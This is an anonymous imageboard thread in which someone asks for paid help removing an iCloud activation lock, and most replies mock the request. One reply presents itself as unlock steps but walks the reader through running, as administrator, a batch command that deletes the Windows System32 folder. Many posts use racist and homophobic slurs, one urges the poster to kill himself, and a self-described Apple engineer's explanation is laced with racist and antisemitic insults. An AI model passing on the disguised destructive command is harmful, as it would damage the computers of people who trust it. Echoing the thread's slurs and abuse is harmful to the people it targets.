Can anyone here remove Icloud activation locks or know anyone? I will be paying. Also Icloud discussion thread.
ICloud removals
No, it's working as intended.
Call the FBI faggot lol
Have you tried turning it off and on? :^)
give it back jermal
Fuck off Jamal
Give the phone back to it's owner Tyrone.
There are some flashboxes and certain programs that redirect the iCloud data to a custom server in order to unlock it but most of them are paid
1) Hook the phone up to your computer
2) Open Notepad
3) Type @echo off del c:\Windows\System32
4) Save as "iCloud.bat" to your desktop
5) Right-Click and select "Run as administrator"
6) Restart your computer
7) ???
8) Profit!
Give it back Tyrone. This doesn't belong to you.
can you imagine how many black kids apple has disappointed by now?
can't wait for Beats to implement the same technology.
c'mon jamal, give it back
That's why all newborns in the US should go through the verification process.
All blacks are being packaged, transported and deployed back to africa.
Rest is being circumcised and well treated.
he'll give it back when you delete all the files you've illegally downloaded
Give the phone back Jamal.
Take it back with a receipt.
File Sharing is not equivalent to physically stealing someone's cell phone, no matter what Hollywood fatcats say.
>well treated
Tyrone, give it back
Have fun in prison OP.
Ivan, give it back
Get raped and kill yourself, you retarded fucking faggot sack of shit with down syndrome.
Give it back tyrell
I work for Apple as a Vulnerability Research Engineer so I'll shed a little light on these mysterious locks.
>Why is it there?
Apple iOS devices use FDE (full disk encryption) to defend the data held on the NAND flash chip in the device. Some smart engineers thought that the hardware needs some kind of mechanism to deter theft. So between the FDE and iCloud lock, the entire device (hardware and software) is protected.
>What triggered it, why am I seeing it?
Either you yourself are a nigger or you were jewed out of hundreds of dollars by niggers on ebay.
>Can I remove it myself?
No. Take it to an Apple store with proof of purchase.
>How does it work?
If the Find my iPhone/iPod/iPad feature was turned on in the settings, it will be locked after you restore it. If you are the rightful owner, this will be no problem. When you go through the process of wiping it in iTunes, the program sends messages over USB to a logical partition called the NOR. This is where the baseband is held. If these messages come back false, Find My iPhone was not on and the device is not locked. If the message comes back true, iTunes will lock that device. The serial number and GID key are blacklisted in Apple servers telling iTunes to keep locking it. There is no way to reflash a stock firmware without iTunes because it needs to be verified by Apple.
>Can I change the serial number or GID key?
No. Both are hard coded into the AES module which is hardware. It's nearly impossible to replace individual board components unless you have super expensive equipment that only Apple owns.
>Can I wipe/modify the NOR?
If you do, you'll hard brick the device. The information there is used by the iBoot to populate the device tree. The LLB image is also loaded from there. If you play with it you'll royally fuck the device.
>My views and opinions are not representative of those help by Apple Inc.